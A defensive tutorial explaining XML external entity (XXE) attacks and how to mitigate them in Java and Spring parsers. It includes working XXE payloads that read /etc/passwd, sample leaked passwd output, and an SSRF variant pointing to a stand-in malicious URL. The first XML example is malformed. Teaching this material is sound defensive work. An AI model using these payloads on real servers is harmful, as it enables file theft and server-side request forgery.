XML is a markup language that we use to define and categorize data. Data stored in XML format can move between multiple servers or between a client and a server.
Once a server receives an XML input, it parses it via an XML parser. XML external entities are basically references in the XML document to files or URLs outside of the XML document. Essentially, it’s an XML standard feature that enables accessing and/or loading external resources.
However, this feature can be dangerous, as it can allow malicious actors to retrieve unauthorized sensitive data, server-side request forgery attacks, and file contents.
What Is XXE?
XML documents adhere to a certain standard. This standard highlights how the XML document should be constructed, outlines what differentiates a valid XML document from an invalid one, and so forth.
The standard also specifies a term called “entity.” An entity is a placeholder for some content.
Entities can be internal or, as in our case, external.
Entities are accessed via a system identifier. This identifier is a pointer to a location. It can either be a file or a URL. The standard specifies what should happen when an XML parser software accesses this entity.
It fetches the file/URL that’s pointed by the system identifier and replaces the system identifier with the contents of the file/website. For instance, if we have an XML document that looks like this:
<?xml version="1.0" encoding="UTF-8"?> <Catalog> <Movie> <Title>World War Z</Title> <Director>Marc Forester</Director> <Country>USA</Country> <Year>2013</Year> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> &xxe; </Movie>
The contents of this line
will be replaced with the contents of the passwords file at file://etc/passwd, which can look like this:
alexander:x:1000:1000:Alexander:/home/alexander:/bin/bash flatpak:x:978:976:User for flatpak system helper:/:/sbin/nologin jenkins:x:977:975:Jenkins Automation Server:/var/lib/jenkins:/bin/false nginx:x:976:974:Nginx web server:/var/lib/nginx:/sbin/nologin redis:x:975:973:Redis Database Server:/var/lib/redis:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin systemd-oom:x:967:967:systemd Userspace OOM Killer:/:/usr/sbin/nologin
Thus, this scenario discloses sensitive user information. Note that this is not a bug, but it’s a feature in the XML specification. The problem arises when the parser allows executing XXEs and we don’t validate the input we receive from the client.
We’ll cover this more in depth later.
Let’s assume you’re browsing an e-commerce website. To retrieve the specification for a certain product (size, weight, price, etc.) the client (in this case, our browser) sends an XML to the server with the product’s ID:
<?xml version="1.0" encoding="UTF-8"?> <product>1478</product>
The server, in turn, should return a response similar to this one:
<?xml version="1.0" encoding="UTF-8"?> <product> <id>1478></id> <name>Trinket Box</name> <description>Small Trinket Box, playing "Marry Had a Little Lamb"</description> <color>blue</color> <price>10</price> </product>
However, if the server doesn’t validate the input properly, we can emulate the client’s call and send the following payload instead:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <product>&xxe;</product>
This will result in the following response from the server:
Invalid product id: alexander:x:1000:1000:Alexander:/home/alexander:/bin/bash flatpak:x:978:976:User for flatpak system helper:/:/sbin/nologin jenkins:x:977:975:Jenkins Automation Server:/var/lib/jenkins:/bin/false nginx:x:976:974:Nginx web server:/var/lib/nginx:/sbin/nologin redis:x:975:973:Redis Database Server:/var/lib/redis:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin systemd-oom:x:967:967:systemd Userspace OOM Killer:/:/usr/sbin/nologin
In addition to compromising file contents, an XXE can be used to create server-side request forgery.
In reference to this line in the example above
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
if the attacker replaces it with a call to an external URL,
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://malicous-code.com"> ]>
this will make the server call the URL address.
If we incorporate the response from this server further down the XML document, it essentially will cause the server to respond with the response from the malicious website and not the intended response.
In turn, this can cause serious implications for this application’s end user.
Consider a website that responds with a form to enter a username and password. If this form was generated due to an SSRF caused by an XXE, the attacker can get the website user’s credentials.
Mitigating XXE Vulnerability
Now that we’ve discussed what XXE vulnerability is, let’s see how we can mitigate this risk in Java and Java Spring.
Java and XXE
As said in the OWASP XXE cheatsheet, “Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use.”
As previously said, XML parsers parse XML documents. To mitigate XXEs, we either need to validate all input, which can be time consuming and tedious, or disable parsing external properties in XML documents entirely.
Since most configurations in Java applications are now done with Java annotations and not XML, the rule of thumb recommendation for mitigating XXEs is to disable XXE processing entirely.
The Spring framework is a popular Java framework for developing enterprise and web applications. Originally created in 2005 by Pivotal, it’s still going strong today.
As XML was in its height of popularity around 2005, Spring originally based its configuration entirely on XML. The original Pivotal developers used XML throughout the system for everything from defining Java beans to configuring the database connection to defining object dependency injection.
Although the Pivotal developers have replaced XML configuration gradually in Spring in favor of Java-based annotations, it’s still fully supported and can be found in abundance in old Java enterprise applications. Hence, that explains the increased importance of mitigating XXE vulnerabilities in Java Spring.
Mitigating Spring XXE
Luckily, Spring has XXE parsing disabled by default. This means that you’re covered in the vast majority of cases. However, there are two caveats to this statement:
- There are many XML parsers you can use in Java, and if you use an XML parser that doesn’t come bundled by default with Spring, you might need to manually disable XXE or carefully validate the input and make sure that you trust the source the entities come from.
- Several versions of Spring had XXE vulnerabilities in the past. Basically, those versions had XXE enabled by default. So, if you’re using one of those versions, you need to upgrade as soon as possible to a patched version. As stated on the OWASP website, the affected versions are
- 3.0.0 to 3.2.3 (Spring OXM and Spring MVC),
- 4.0.0.M1 (Spring OXM), and
- 4.0.0.M1-4.0.0.M2 (Spring MVC).
To fully address these issues, you need to upgrade to Spring Framework 3.2.8+ or 4.0.2+.
Note that another way to avoid the XXE issue altogether is to use a different format for sending messages between multiple servers or between client and server.
In recent years, the most popular format is JSON, which doesn’t introduce these kind of vulnerabilities. Likewise, you can replace XML-based SOAP APIs with simple HTTP REST APIs, which don’t usually use XML.
XML is a useful format for defining and representing structured data. As part of the XML standard, it’s possible to import entities from external resources.
Although this can be a useful feature, it also possesses a security risk. Malicious actors can inject their values into the XML, and if the server is not hardened, the system can become compromised.
Files can be stolen, and server response can be forged. Java applications are especially vulnerable to such attacks, as most Java XML parsers allow parsing XXE entries.
Spring is a popular Java framework. Fortunately, it comes with XXE parsing disabled. However, XXE was enabled in several Spring versions in the past. Lastly, if you use an XML parser other that the one built in with Spring, you’ll need to manually validate the input or disable XXE parsing.